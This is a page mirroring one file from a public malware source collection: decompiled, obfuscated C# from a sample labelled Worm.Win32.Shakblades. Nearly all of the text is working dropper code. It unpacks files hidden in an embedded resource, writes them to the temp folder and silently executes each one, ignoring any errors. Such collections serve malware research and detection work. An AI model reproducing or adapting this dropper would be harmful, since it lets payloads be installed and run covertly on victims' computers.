mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
38 lines
1.3 KiB
C#
38 lines
1.3 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: Ҧ߲๒ʽ໙ୄᴘ.෧ᠮबZố
|
||
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
||
|
||
using System.Diagnostics;
|
||
using System.IO;
|
||
using System.Reflection;
|
||
using System.Resources;
|
||
using System.Threading;
|
||
|
||
namespace Ҧ߲๒ʽ໙ୄᴘ
|
||
{
|
||
internal class \u09D0෧ᠮबZố
|
||
{
|
||
public static void ᬪ() => new Thread((ThreadStart) (() =>
|
||
{
|
||
BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷((byte[]) new ResourceManager("b", Assembly.GetExecutingAssembly()).GetObject("b"), false)));
|
||
while (binaryReader.PeekChar() != -1)
|
||
{
|
||
string str = binaryReader.ReadString();
|
||
int count = binaryReader.ReadInt32();
|
||
byte[] bytes = binaryReader.ReadBytes(count);
|
||
try
|
||
{
|
||
if (!File.Exists(Path.GetTempPath() + str))
|
||
File.WriteAllBytes(Path.GetTempPath() + str, bytes);
|
||
Process.Start(Path.GetTempPath() + str);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
})).Start();
|
||
}
|
||
}
|